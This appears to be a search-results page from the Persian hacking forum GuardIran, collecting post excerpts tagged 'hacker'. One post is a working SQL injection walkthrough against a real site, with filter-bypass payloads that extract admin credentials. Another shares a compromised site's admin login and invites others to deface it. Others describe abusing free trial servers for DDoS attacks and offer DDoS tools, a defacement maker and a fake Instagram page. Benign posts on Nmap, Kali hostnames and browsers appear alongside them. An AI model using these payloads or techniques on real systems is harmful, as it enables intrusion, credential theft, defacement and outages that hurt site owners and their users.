رفتن به مطلب
بازگشایی انجمن! ×
GuardIran

جستجو در تالارهای گفتگو

در حال نمایش نتایج برای برچسب های 'hacker'.

  • جستجو بر اساس برچسب

    برچسب ها را با , از یکدیگر جدا نمایید.

  • جستجو بر اساس نویسنده

نوع محتوا


تالارهای گفتگو

  • انجمن گاردایران
    • قوانین و اطلاعیه های سایت
    • اخبار هک و امنیت
    • انتقادات و پیشنهادات
    • بخش خصوصی
    • بخش ویژه - VIP
    • بخش زیر زمینی
  • سوال و جواب های عمومی
    • سوال و جواب های نفوذ به سایت ها و سرورها و روشهای مقابله
    • سوال و جواب های امنیت سیستم های شخصی
    • سوال و جواب های برنامه نویسی
    • سوال و جواب های ابزارهای امنیتی
    • سوال و جواب های شبکه
    • سوال و جواب های مدیریت محتوا و وبلاگ ها
    • سوال و جواب های بخش Trojan , Rat , Keylogger
    • سوال و جواب های سیستم عامل ها
    • سوال و جواب های امنیت ایمیل های شخصی
    • سوال و جواب الکترونیک
    • سوال و جواب های موبایل
    • سوال و جواب های متفرقه
  • انجمن نفوذ و امنیت
    • آموزش های تصویری
    • آموزش های تصویری نفوذ به سیستم های شخصی و روشهای مقابله
    • آموزش های تصویری سایت ها و سرورها و روشهای مقابله
    • آموزشهای تصویری شبکه و روشهای مقابله
    • حملات شبکه و راههای مقابله
    • DOS , DDOS
    • ویروس ها و تروجان ها
    • متاسپلویت Metasploit
    • ابزارهای امنیتی
    • Shell Script
    • آسیب پذیری های وایرلس
    • اکسپلویت
    • باگ های امنیتی
    • امنیت ایمیلهای شخصی
    • تارگت های تمرینی
    • اسکنرها و ابزارهای هکینگ
  • بخش کرک و رمزنگاری
    • ابزار کرک
    • مقالات و آموزشهای کرک
    • مقالات و آموزشهای رمزنگاری
    • ابزارهای رمزنگاری
    • پروکسی لیست
    • پسورد لیست و کمبو لیست
    • کانفیگ
    • اکانت های کرک شده
  • برنامه نویسی
    • برنامه نویسی
    • برنامه نویسی تحت وب
  • بخش موبایل
    • بخش مخصوص موبایل
    • هک موبایل
  • شبکه
    • Cisco سیسکو
    • نتورک پلاس Netwok+
    • مایکروسافت Microsoft
    • میکروتیک Microtics
    • مجازی سازی
    • ابزارهای شبکه و مانیتورینگ
    • فایروال
  • سیستم عامل
    • لینوکس
    • ویندوز
    • کالی لینوکس Kali Linux
    • مکینتاش
  • الکترونيک و روباتيک
    • الکترونيک
    • ميکروکنترلرها و پروسسور ها
    • نرم افزار هاي تخصصي برق و الکترونيک
    • روباتيک
  • گرافيک
    • فتوشاپ
    • فلش
  • متفرقه
    • بحث آزاد

وبلاگ‌ها

چیزی برای نمایش وجود ندارد

جستجو در...

نمایش نتایجی که شامل...


تاریخ ایجاد

  • شروع

    پایان

آخرین بروزرسانی

  • شروع

    پایان

فیلتر بر اساس تعداد...

تاریخ عضویت

  • شروع

    پایان

گروه

About Me

23 نتیجه پیدا شد

  1. come-to-me

    اکسپلویت نویسی مقدماتی تا پیشرفته

    come-to-me پاسخی ارسال کرد برای یک موضوع در اکسپلویت

    ▀▄▀▄▀▄ بسم الله الرحمن الرحیم ▄▀▄▀▄▀ در این دوره آموزشی شما را به صورت مقدماتی تا پیشرفته با بحث اکسپلویت نویسی آشنا تا شما کاربران محترم انجمن گاردایران به راحتی بتوانید اکسپلویت های خود را بعد از این آموزش در سایت های مختلف ثبت اکسپلویت ثبت کنید.این دوره شامل کار با دورک، معرفی سایت‌های ثبت اکسپلویت معتبر، توضیح در مورد قسمت‌های مختلف یک اکسپلویت استاندارد و شرایط ثبت آن در سایت‌های مختلف، و همچنین ثبت کردن اکسپلویت به صورت کاملا پروژه محور میباشد در این دوره یکی از روش‌های پیدا کردن اکسپلویت از طریق حفره امنیتی SQL Injection به صورت کامل گفته خواهد شد توضیح کوتاهی در مورد اکسپلویت برای درک بهتر شما عزیزان اکسپلویت چیست؟ اکسپلویت کدی برای سوء استفاده از حفره‌های امنیتی که برای مثال میتوان : برنامه‌های کاربردی، سیستم عامل، هسته سیستم عامل، وب سرور و به صورت کلی هر نرم‌افزاری که در یک شبکه و یا رایانه کار می‌کند , اکسپلویت گفته میشود و همچنین اکسپلویت را می‌توان با زبان‌های مختلف برنامه‌نویسی نوشت که متخصصان امنیتی برای اثبات آسیب‌پذیری‌های مختلف اقدام به نوشتن اکسپلویت میکنند.اکسپلویت نویسی بسیار برای امر بچ کردن باگ های مختلف مفید است فصل اول | مقدمه و آشنایی مقدمه دوره معرفی ابزارهای مورد نیاز آشنایی با اصطلاحات و دورک نویسی فصل دوم | اموزش کشف باگ و اکسپلویت نویسی در php نحوه نوشتن استاندارد یک اکسپلویت کشف حفره امنیتی SQL Injection کشف حفره امنیتی Remote File Upload کشف حفره امنیتی Cross Site Scripting کشف حفره امنیتی Remote/Local File Inclusion کشف حفره امنیتی Local File Disclosure کشف حفره امنیتی Remote Command Execution توجه : لطفا در تاپیک اسپم کنید آموزش ها به صورت تصویری همراه با صدا میباشد
  2. nonamee

    هک اینستگرام شاخ مجازی

    nonamee پاسخی ارسال کرد برای یک موضوع در اخبار هک و امنیت

    به نام خدا شب گذشته اکانت شاخ مجازی و دزد پول مردم بار دیگر هک شد به وسیله ی شخصی به نام mr__nking موفق باشید
  3. Zed

    ساخت دیفیس در 1 دقیقه

    Zed پاسخی ارسال کرد برای یک موضوع در Python

    سلام دوستان من باز اومدم تو این تاپیک می خوام یک ابزار رو بهتون معرفی کنم ابزاری که باهاش می تونید توی یک دقیق دیفیس تون رو بسازید بریم سراغ کارمون من یک ویدیو میزارم ببینید خوش گویا همچی هست Rec 0009.mp4 خب فیلم رو دیدید تنها چیزی که می مونه اینه که ادمین های عزیز این قطع کد رو به css دیفیس اضافه کنن .retiredmanager { text-shadow: 1px 1px 10px #4d79ff; color: #4d79ff; } .golduser { text-shadow: 1px 1px 10px #fffd00; color: #fffd00; } .activeuser { text-shadow: 1px 1px 10px #57ff0c; color: #57ff0c; } .user { text-shadow: 1px 1px 10px #b6ec86; color: #b6ec86; } .newuser { color: #fff; } امیدوارم که به کارتون بیاد این ابزار بیشتر برای این هست که یک نظم کلی به دیفیس داده بشه تا نیاز نباشه فرد خودش دست به ادیت بشه یا چیز های اضافه به دیفیس اضافه کنه هم فایل py رو این پایین میزارم دوست داشتید استفاده کنید این نسخه 1.1 ابزار هست اگر شد نسخه های بعدیش رو هم میزنم میزارم استفاده کنید البته چیز زیادی داخلش فرق نمی کنه فقط جزئیات ظاهر یا چندتا کاربرد دیگه تا تاپیک های بعدی خدانگهدار Tools.py
  4. Zed

    دوره جامع NMAP

    Zed پاسخی ارسال کرد برای یک موضوع در اسکنرها و ابزارهای هکینگ

    سلام دوستان NMAP در این تاپیک می خوام به شما دوستان عزیز آموزش این ابزار بسیار قدرتمند رو بدم میشه گفت تقریبا تمام هکر ها این ابزار رو میشناسن و ازش استفاده می کنن برای اینکه این تاپیک مثل تاپیک قبل نشه من از همین پست اول قوانین رو میزارم تا باهاشون آشنا باشید قوانین : 1- اگر سوالی داشتید می تونید یا به گارد ایران یا به دیسکرود من پیام بدید 2- اگر پیشنهادی دارید می تونید به گارد ایران یا دیسکورد من پیام بدید 3- اگر قصد دارید در ساخت این دوره به من کمک کنید ابتدا با بنده هماهنگ کنید و سر خود چیزی در این تاپیک ارسال نکنید 4- از اسپم زدن یا رعایت نکردن قوانین انجمن و این تاپیک به شدت خوداری کنید 5-اگر از مطالب تاپیک و دوره راضی بودید می تونید گزینه لایک پایین صفحه سمت چپ رو بزنید در هیچ صورتی برای تشکر نه اسپم بزنید نه پیوی من پیام بدید 6- دوره هر 2 روز یک بار آپدیت میشه صبور باشید - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - سرفصل های اصلی دوره : 1- آشنایی مقدماتی با انمپ 2- آرگومان های کاوش در شبکه 3- آرگومان های پیشرفته انمپ - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - لیست زیر شاخه های سرفصل ( آشنایی مقدماتی با انمپ ) : 1- نصب و راه اندازی انمپ بر روی پلتفرم های مختلف 2- آشنایی با محیط و دستورات انمپ 3- اسکن پورت ها 4- جمع آوری اطلاعات با انمپ - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - لیست زیر شاخه های سرفصل ( آرگومان های کاوش در شبکه ) : 1- زمان بندی مناسب در انمپ 2- بایپس های امنیتی در انمپ 3- ذخیره اطلاعات دریافت شده با انمپ 4- رفع ارور های انمپ - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - لیست زیر شاخه های سرفصل ( آرگومان های پیشرفته انمپ ) : 1- آموزش کار با ابزار زنمپ 2- اسکریپت های انمپ 3- اسکریپت های پیشرفته انمپ - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - نکته قابل توجه : هر کدام از زیر شاخه های شامل چند مبحث میشود به دلیل متنی بودن این دوره مجبوریم از بعضی مباحث گذر کنیم اگر دوست دارید در ساخت این دوره به من کمک کنید یا پیشنهادی دارید می توانید به دیسکورد من پیام ارسال کنید
  5. Zed

    خلاقیت در حمله

    Zed پاسخی ارسال کرد برای یک موضوع در ابزار حملات Dos & DDOS

    سلام دوستان آموزش می خوام ی روش کاربردی بهتون آموزش بدم که در حملات دیداس خیلی کار آمد هست شاید ما اونقدر پهنای باند خوبی برای انجام این حمله نداشته باشیم و موفق به دان کردن سرور نشیم اینجاست که خلاقیت به کار ما میاد اونم این هست که از سرور هایی که داریم کمک بگیریم که شاید بعضی ها سرور نداشته باشن و یا سرورشون برای این کار مناسب نباشه دقیقا این نقطه شروع ی خلاقیت جالبه ما سایت های زیادی رو میبینیم که قبل از اینکه سرور بفروشن اون رو به افراد برای یک روز و تست کردن سرور مجانی میدن حالا ما با استفاده از همین روش پهنای باند خودمون رو بزرگ تر می کنیم خب صحبتش ساده هست اما انجام چجوری هست من برای مثل یک سایت رو بهتون معرفی می کنم [Hidden Content] این سایت برای 30 دقیقه بهتون سرور میده که تستش کنید 30 برای ی هکر خیلی زیاد هم هست تنها کاری که باید کرد اینه که ی ابزار دانلود کنی و ران کنی به همین راحتی چیز جالب تر این هست که بعد از 30 دقیقه سرور از دسترس شما خارج نمیشه و فقط ی صفحه برای شما میاره بالا که میگه اگر سرور رو می خواید ثبت نام کنید و سرور که شما بهش دستور دیداس دادید هم داره کار خودش رو انجام میده من برای نمونه یک فیلم ضبط کردم که می تونید پایین تاپیک مشاهدش کنید فیلم رو ضبط کردم ما به دلیل اینکه حجمش بیشتر از حجم مجاز برای اپلود هستش داخل سایت دیگری اپلودش کردم که می تونید برید و ببینید لینک ویدیو همونطور که در انتهای فیلم دیدید من می تونم هر چندتا سرور که خواستم ازش بگیرم بهتون پیشنهاد می کنم یکی یکی پیش برید یعی یک سرور روی اوکی کنید بعد برید سراغ سرور بعدی سرعت عمل خیلی مهم هستش نکته اخر بعید میدونم nsa.gov به اون راحتی دان شده باشه به احتمال زیاد مشکل از سمت من بود که سایت لود نمیشد
  6. Zed

    دوره جامعه nmap

    Zed پاسخی ارسال کرد برای یک موضوع در اسکنرها و ابزارهای هکینگ

    سلام دوستان در این تاپیک می خوایم آموزش کار با ابزار قدرتمند NMAP رو بزاریم من داخل سایت گشتم اما آموزش کامل رو پیدا نکردم اگر هم بود من ندید از حاشیه های که بگذریم از همین امروز دوره ما شروع میشه من سعی می کنم هر روز دوره رو پیش ببرم تا تمام مباحث این اسکنر قویی رو باهم به خوبی درک و فرا بگیریم این تاپیک بیشتر تاپیک معرفی هست قسمت اول آموزش فردا روی سایت قرار میگره قسمت اول آشنایی با ابزار و آموزش نصب
  7. Zed

    ابزار defaker

    Zed پاسخی ارسال کرد برای یک موضوع در قوانین و اطلاعیه های سایت

    سلام دوستان داخل این تاپیک می خوام بهتون نسخه 1.2 ابزار ساخت صفحه دیفیس رو معرفی کنم می تونید از این لینک نسخه 1.1 رو مشاهده کنید دوستان خیلی سر عنوان مشکل داشتن برای همین ما اسم ابزار رو گزاشتیم defaker که مخففه deface maker هستش نسخه بعدی این ابزار 2.3 خواهد بود که تغییرات زیادی خواهد داشت ( ساخت دیفیس {برای صفحه وب , برای سیستم عامل ها} ابزار های تست نفوذ وب باگ های { sql , xss , . . . } قابلیت ساخت و کنترل ویروس برای سیستم عامل های مختلف و . . . ) نمایه از ابزار ( نسخه 1.2 ) امیدوارم براتون کار آمد باشه تا فراموش نکردم باید تشکر کنم از دوست خوبمون @SHIWPTS13 که خیلی به من داخل ساخت این ابزار کمک کرد و کمک می کنند در همین تاپیک باید نوید ابزار SMSbomber رو بهتون بدم در دو پلتفرم وب ( می تونید لوکال هاست بیارید بالا یا از سایت استفاده کنید ) سیستم عامل ها ( گرافیکی ) به امید خدا به زودی سعی می کنیم این ابزار ها رو براتون قرار بدیم تا تاپیک های بعدی خدانگهدار در پناه حق 👋 defaker.rar نویسنده : Z🙂D
  8. Zed
    سلام دوستان من یک سایت رو زدم ولی هر کاری می کنم تو زون اچ ایرانی ثبت نمیشه ارور 500 سرور میده یوزر پسورد رو میزارم می تونید برید به اسم خودتون دیفیس کنید و ثبتش کنید شاید سایت منو بلاک کرده باشه در هر صورت ادرس سایت : [Hidden Content] یوزر : Zed پسورد : HackerZed ادرس پیج ادمین :[Hidden Content]/_admin/ می تونید شل اپ کنید مث دیفیس کنید یا دیفیس هاتون رو تست کنید
  9. Zed

    تغییر اسم میزبان در کالی لینوکس

    Zed پاسخی ارسال کرد برای یک موضوع در کتاب ها و مقالات

    سلام بازم منم امیدوارم روز خوبی داشت باشید امروز با یک حرکت خطر ناک اومدم می خوای بریم اسم میزبان رو تغییر بدیم از همین الان بهتون هشدار بدم که ممکن کالیتون بر باد بره پس مراقب باشید من هیچ مسئولیتی رو نمیپزیرم چون خودم تست کردم کار کرد گفتم به شما هم بگم حالا اصلا نام میزبان کدوم نام هست کجا نمایش داده میشه عرض به حضور شما که این دوست عزیزمون که دورش خط کشیدم نه اون ی دوست عزیزمون رو میگن اسم میزبان حالا من دوست دارم عوض کنم خب مثل بچه ادم میرم عوض می کنم 😁 بریم سراغ کار خودمون اول ترمینال رو باز می کنید بعد دستور زیر رو وارد می کنید اول می نویسم بعد توضیح میدم sudo nano /etc/hostname sudo میزنیم که بهمون اجازه بده روی فایل مورد نظر ادیت بزنیم nano هم که یک ویرایشگر هست /etc/hostname مسیر فایل مورد نظر هست (به علت زبان شیرین پارسی اسلش{/}افتاده جلویhostname که به بزرگی خودتون ببخشید و یک فایل نت پد که همه دستور ها داخلش باشه این پایین میزارم تا مشکلی نداشته باشید ) بعد از زدن این دستور زیبان با یک چنین صفحه زیباتری رو به رو میشید ( به اون ترمینال سمت چپ دقت نکنید برای این گزاشتمش ک بدونید از جایی این پست رو اسکی نرفتم ) خب این صفحه زیبا داره به زبون ساده داره میگه : اگه تو همونی هستی که میگی بیا پسورد رو وارد کن ببینم 😆 ی جورایی کالی داره میگه ثابت کن بهم که تو همونی 😂 اینجا باید پسوردتون رو بزنید و بعد از زدن پسورد با یک صفحه خشگل که این پایین میزارم مواجه نمیشید بلکه میبینیدش 😁 اینجا شما نام میزبان رو میبینید که می تونید تغییرش بدید که من خوشم میاد بزارم Anonymous حالا شما هر جور راحت هستید به دین شکل می نویسید و ctrl + X رو میزنید یعنی من می خوام خارج بشم که با این تصور مواجه میشید اینجا کالی میگه می خوای برات سیو کنم که شما میگید ی من و با فشار دادن کلید y و بعد از اون زدن Enter فایل رو سیو می کنید به محض زدن Enter با این صفحه مواجه میشید حالا وقتشه که بریم سراغ دستور بعدی حالا دستور زیبای sudo nano /etc/hosts میزنید و با این صفحه مواجه میشید اون کالی رو میبینید اون وسط میرید تغییر میدید دقیقا باید همون اسمی که قبلا گزاشتید رو اینجا هم بزارد و مثل فایل قبل سیو کنید بعد از سیو کردن با این صفحه مواجه میشید میبینید که همچنان کالی به قوت خودش باقی هست پس یک بار سیستم رو با دستور sudo reboot reboot می کنیم و وقتی کالی بیاد بالا اسم میزبان شما تغییر کرده دقت کنید یوزر تغییر نکرده اسم میزبان تغییر کرده به این شکل تا تاپیک های بعدی در پناه حق 👋 فایل نوت پد دستورات : Kali.txt
  10. Zed

    بهترین سیستم عامل برای تست نفوذ

    Zed پاسخی ارسال کرد برای یک موضوع در کتاب ها و مقالات

    یکی از پر چالش ترین موضوعات برای یک هکر انتخاب سیستم عامل هست البته در حال حاضر یک تاز میدان Kali Linux هست که واقعا هم سیستم عامل قدرتمندی هست اما امروز اومدم ی سیستم عامل بهتون معرفی کنم کار کردن باهاش برای مبتدی ها هم آسون تر هست هم ابزار های بیشتری داره از همه مهم تر ساخت ایران هستش که خیلی خوب هست البته نیومد یک طرفه به قاضی برم و همش بزنم تو سر لینوکس بله ترمینال لینوکس خیلی خیلی قدرتمند و سریع هستش اما ویندوز هم خوبی های خودش رو داره امروز اومدم با معرفی سیستم عامل black win که سیستم عامل بسیار خوبی هست و تحت ویندوز هستش خب رو ویندوز فوت شاپ نصب میشه گیم نصب میشه کلا هر کاری دوست داری کن ولی لینوکس دهنت سرویس میشه بخوای رو کالی گیم نصب کنی ! در نهایت هم همچیز بستگی به خودم ادم داره که کدوم رو انتخاب می کنه اما پیشنهاد من به شما بلک وین هست تا تاپیک بعدی 👋
  11. MR.MSA

    Guardiran Explpot Database

    MR.MSA پاسخی ارسال کرد برای یک موضوع در اکسپلویت

    با سلام خدمت دوستان عزیز شاید قبلا Guardiran Exploit Database رو جز خدمات Mr.MSA دیده باشید: اما از الان به بعد برای این پروژه یک دامین جدید گرفتم و به پروژه جدا تبدیل شد: exploit-db.ga نکات مهم درمورد این سیستم: ۱- این سیستم کلا از خدمات MR.MSA جدا میشه ولی از طرفی یکی از خدمات و پروژه های من هست! ۲- دامین تا یک سال تمدیده. ۳- پروژه که php بود رو html کردم. ۴- سورس در گیتهاب موجود میباشد. ۵- اکسپلویت های بخش vip انجمن قرار داره. لینک گیت هاب موفق و پایدار باشید.
  12. MR.MSA

    نظر سنجی کشف آسیب پذیری

    MR.MSA پاسخی ارسال کرد برای یک موضوع در باگ های امنیتی

    لطفا در نظر سنجی قرار دادن ویدئوی تست و نفوذ وبسایت ها و کشف باگ که بیشتر سایت ها هست شرکت کنید.
  13. nonamee

    Html,Css

    nonamee پاسخی ارسال کرد برای یک موضوع در HTML

    𝕚𝕟 𝕥𝕙𝕖 𝕟𝕒𝕞𝕖 𝕠𝕗 𝕘𝕠𝕕 با سلام و احترام خدمت تیم محترم 𝓰𝓾𝓪𝓻𝓭𝓲𝓻𝓪𝓷 در این تاپیک آموزش Html,Css را قرار خواهم داد ودر در دوره های بعدی با html5,css3 و جی کوئری ، بوت استرپ 4 ، پایگاه داده mysql و زبان برنامه نویسی php آشنا خواهید شد پس لطفا در تاپیک ها اسپم وارد نکنید و برای ادامه آموزش ها تاپیک ها را بپسندید
  14. nonamee

    DDOS ATTACK

    nonamee پاسخی ارسال کرد برای یک موضوع در ابزار حملات Dos & DDOS

    nonamee
  15. nonamee

    بدافزار روت‌کیت (Rootkit)

    nonamee پاسخی ارسال کرد برای یک موضوع در تروجان و کیلاگر

    nonamee
  16. nonamee

    تارگت برای آموزش Sqlinjection 2

    nonamee پاسخی ارسال کرد برای یک موضوع در تارگت های تمرینی

    ••.•´¯`•.•• 🎀 به نام خدا 🎀 ••.•`¯´•.•• با سلام خدمت کاربران محترم انجمن گاردایران در این تاپیک قصد دارم تارگت با نکات خاص رو خدمتتون آموزش بدم ولی قبلش باید یادآوری کنم که این آموزش ها فقط برای آشنایی و یادگیری شماست هر گونه استفاده ی غیرمجاز به عهده ی خود شماست ! در ضمن دوستان عزیزی که به ضمینه ی هک و امنیت علاقه مند هستند میتوانند این آموزش هارو دنبال کنند و با مراجعه به تاپیک های قبلی بنده میتونید این آموزش رو از اول یاد بگیرید چون در اینجا فقط به نکات اشاره خواهد شد نکته : هک ر شدن بچه بازی نیست که بخوای برای آسیب رسوندن به دیگران یا تفریح یادبگیری اگر اهدافت برای یادگیری هک اینه همین الان میتونی اینجارو ترک کنی تارگت : [Hidden Content] با قرار دادن ' آسیب پذیری مشخص خواهد شد [Hidden Content]' حال به سراغ دستورات بعدی برای پیدا کردن ستون های سایت میرویم با استفاده از دستور [Hidden Content] order by 99999-- بسیار خب میبینیم که به کلمه ی order حساس هستش پس بایپس کلمه ی order رو قرار میدیم -> group [Hidden Content] group by 99999-- صفحه load میشود در صورتی که نباید load َود چون هیچ سایتی انقدر ستون ندارد پس بایپسشو قرار میدیم [Hidden Content]' group by 99999--+ انقدر اعداد رو کم میکنیم تا صفحه load شود به 25 خواهیم رسید بدین صورت [Hidden Content]' group by 25--+ حال باید دستورات بعدی برای بیرون کشیدن database اعمال کنیم برای راحتی کارشما که شاید برنامه Hackbar روی مرورگرتون نصب نباشه لیست اعداد رو تهیه کردم که بتونید راحت جای گذاری کنید union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70 خب دستورات رو وارد میکنیم بدین شکل [Hidden Content]' union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25--+ ولی با یک Error معروف رو به رو خواهیم شد پس با دستور /*!00000union*/ بایپس میکنیم [Hidden Content]' /*!00000union*/ select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25--+ خب حالا میریم سراغ بیرون کشیدن table های سایت [Hidden Content]' /*!00000union*/ select 1,2,3,4,5,6,group_concat(table_name,0x3c62723e),8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25+from+information_schema.tables+where+table_schema=database()--+ میبینیم که دوباره با Error معروف Not Acceptable! مواجه خواهیم شد خیلی راحت با دستوراتی که خدمتتون عرض کردم بایپس کنید بدین شکل [Hidden Content]%27%20/*!00000union*/%20select%201,2,3,4,5,6,/*!00000group_concat(table_name,0x3c62723e)*/,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25+/*!00000from*/+/*!00000information_schema.tables*/+/*!00000where*/+table_schema=database()--+ سایتی رو معرفی میکنم که برای hex کردن متن کمکتون میکنه Text To Hex بسیار خب میریم سراغ دستورات بعدی شروع به hex کردن admin_log میکنیم و در دستور قرار میدیم (اگر با دستورات آشنا نیستی موضوعات قبلی تاپیک های بنده رو ببین ) [Hidden Content]%27%20/*!00000union*/%20select%201,2,3,4,5,6,/*!00000group_concat(column_name,0x3c62723e)*/,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25+/*!00000from*/+/*!00000information_schema.columns*/+/*!00000where*/+table_name=0x61646d696e5f6c6f67--+ و دستور بعد برای استخراج داده [Hidden Content]%27%20/*!00000union*/%20select%201,2,3,4,5,6,/*!00000group_concat(uid,0x3a,upass,0x3c62723e)*/,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25+/*!00000from*/+admin_log--+ دوستان عزیز لطفا از آموزش ها سو استفاده نکنید این آموزش ها فقط برای یادگیری شماست پس لطفا کسی رو دیفیس نکنید سعی میکنم هر روز یک تاپیک در مورد تارگت با نکات خاص قرار بدم لطفا در اینجا اسپم نکنید برای ادامه ی آموزش ها فقط تاپیک را بپسندید موفق باشید admin11:admin11 username & password
  17. MR.MSA

    Mr.Hasher Tool

    MR.MSA پاسخی ارسال کرد برای یک موضوع در ابزارهای امنیتی

    با سلام خدمت شما دوستان عزیز انجمن تیم امنیتی گاردایران با یک ابزار در خدمتتون هستیم . Mr.Hasher نویسنده نسخه PHP‌: @MR.MSA نویسنده نسخه C# : @HCSH4C39 نحوه استفاده : امروز می خوام یه ابزار رو ارائه بدم که شما یک متن رو میدید بهش و برای شما به انواع هش ها هش میکنه . نسخه : این برنامه در دو نسخه php و c# ارائه می شود که php تحت وب و c# قابلیت اجرایی exe (تحت ویندوز) هست . نوع هش ها : در نسخه php MD5 MD4 MD2 SHA1 SHA224 SHA256 SHA384 SHA512 SHA3-224 SHA3-256 SHA3-384 SHA3-512 RIPEMD-128 RIPEMD-160 RIPEMD-256 RIPEMD-320 FNV132 FNV1A64 FNV164 FNV1A32 HAVAL-128,3 HAVAL-160,3 HAVAL-192,3 HAVAL-224,3 HAVAL-256,3 HAVAL-128,4 HAVAL-160,4 HAVAL-192,4 HAVAL-224,4 HAVAL-256,4 HAVAL-128,5 HAVAL-160,5 HAVAL-192,5 HAVAL-224,5 HAVAL-256,5 TIGER-128,3 TIGER-160,3 TIGER-192,3 TIGER-128,4 TIGER-160,4 TIGER-192,4 ADLER-32 CONVERTUUENCODE GOST JOAAT CRC32C CRC32B CRC32 SNEFRU WHIRLPOOL BASE64 HEX ASCII در نسخه C# MD5 SHA 160 SHA 256 SHA 384 SHA 512 RIPEMD 160 لینک های مهم : 1- GitHub 2- Demo Online موفق و پیروز باشید .
  18. nonamee

    DDos ATTack

    nonamee پاسخی ارسال کرد برای یک موضوع در ابزار حملات Dos & DDOS

    سلام خدمت دوستان عزیز در این پست چند برنامه DDoS قرار دادم و یک فایل سورس که میتونید خیلی راحت کامپایل کنید و نحوه ی کد نویسی رو ببینید که خودتون این نوع حملات رو بنویسید با تشکر💖 Mr_Zero Desktop.zip source code.zip
  19. MR.MSA

    برسی مرورگرها

    MR.MSA پاسخی ارسال کرد برای یک موضوع در بحث آزاد

    با سلام خدمت دوستان عزیز در این تاپیک قصد دارم که مرورگر ها رو باهم برسی کنیم . این روز ها شاید بعضی هکر ها بین چند مرورگر اختلاف نظر داشته باشند برای همین باهم اینجا این ها رو برسی میکنیم . ما می خواهیم مرورگرهای کروم ، فایرفاکس ،‌ تور و اپرا رو برسی کنیم که جز قوی ترین مرورگر ها هستند و بین ما هکر ها محبوبیت دارد ، خب بریم برسی رو شروع کنیم . اولین مرورگر یعنی Google Chrome ‌: همانطور که می دانید کروم متعلق به شرکت گوگل هست و گوگل یک موتور جستوجو قوی هست و بیشتر هکر ها از google استفاده می کنند به خاطر دورک ، امنیت ، سرعت و.... گوگل كروم به عنوان يكی از پركاربردترين مرورگرها در سراسر جهان شناخته می‌شود و بین خیلی ها محبوبیت دارد . از جمله ویژگی های کروم می توانیم اشاره کنیم به : سازگاری خوب با گوگل و نسخه های مختلف سرعت خوب و سازگاری با سیستم عامل های Windows، macOS، Linux، Android، iOS افزونه های بسیار زیاد و نرم افزار های افزودنی که داره جذابش می کنه (اما بعضی افزونه ها خوب کار نمی کند ) توضیحات : Chrome 79 به هیچ وجه مرورگر بدی نیست و پشتیبانی و همگام سازی متقابل پلتفرم ، ویژگی های خودکار کامل و برخی ابزار های خوب عالی برای توسعه دهندگان وب است . این می تواند به شما هشدار دهد اگر ایمیل شما به خطر بیفتد، از جستجوی DNS مطمئن برای ارائه دهندگان سازگار برخوردار است (خود DNS عمومی Google یکی از آنهاست) و بسیاری از محتوای مخلوط خطرناک مانند اسکریپت ها و تصاویر را در اتصالات غیرقابل اطمینان مسدود می کند. همچنین WebXR API را برای AR و VR فعال می کند. و .... نکات مثبت مرورگر کروم : حالت تاریک Chrome یک نکته مثبت است که می توانم بهش اشاره کنم . گوگل کروم به طور مداوم در لیست امن ترین مرورگرها قرار دارد و همانطور که گفتم و خبر دارید امنیت بسیار بالایی دارد. در تست های هک عملکرد خوبی دارد و بروزرسانی های مداوم و ماهیانه ای که داره شما رو بروز قرار می دهد. در مسابقات سالانه هک کردن Pwn2Own در چندین نوبت (و همچنین جوایز امنیتی دیگر) بخش “امن ترین مرورگر” را به دست آورد. نکات بدی که داره : عمده موارد مربوط به حریم خصوصی ، برنامه های افزودنی مرورگر می تواند باعث ایجاد مشکلات امنیتی و ... شود . میرویم سراغ مرورگر دوم یعنی Firefox : مرورگر فایر فاکس یک مرورگر محبوب در سرار جهان است که بیشتر خود ما ایرانی ها از این مرورگر استفاده می کند ، من هکر های زیادی رو تا به حال دیدم که از فایرفاکس استفاده می کنند ، فایرفاکس رقیب کروم هست و توی امنیت خیلی خوب خودش رو ثابت کرده است . از جمله ویژگی ها می توانیم اشاره کنیم به سرعت بالا مرورگر افزونه ها و ابزار های افزودنی افزونه های مورد استفاده در هک مثل hackbar و live http header (در کروم هم موجود هستند) نسخه های مختلف مرورگر ، برای توسعه دهندگان وب و درميان توسعه‌هندگان فايرفاكس احتمالا محبوب‌ترين مرورگر جهان است. با استفاده از این مرورگر میتوانید به یک خطایاب جاوا اسکریپت دست پیدا کنید. به علاوه ، با نسخه توسعه دهنده فايرفاكس ، شما به موتور CSS نسل بعد (نوشته شده در RUST) دسترسی پيدا خواهيد كرد ، يک سيستم CSS غيرفعال كه اعلان‌هايی كه بر روی صفحه اثر ندارد را غيرفعال می‌كند، و مواردی بيش از اين هم ارائه می‌كند. همچنين یک هاست “Firefox DevTool” برای دسترسی بهتر وجود دارد . پیشنهاد می کنم که اگر از مرورگر فایرفاکس یا کروم استفاده می کنید برای امنیت بالاتر در مرورگر خود از افزونه LastPass برای ذخیره پسورد ها تون استفاده کنید . سعی کردم بیشتر توضیحات رو بدم و امیدوارم لذت برده باشید . شاد باشید 😅
  20. MR.MSA

    پیج فیک اینستاگرام

    MR.MSA پاسخی ارسال کرد برای یک موضوع در HTML

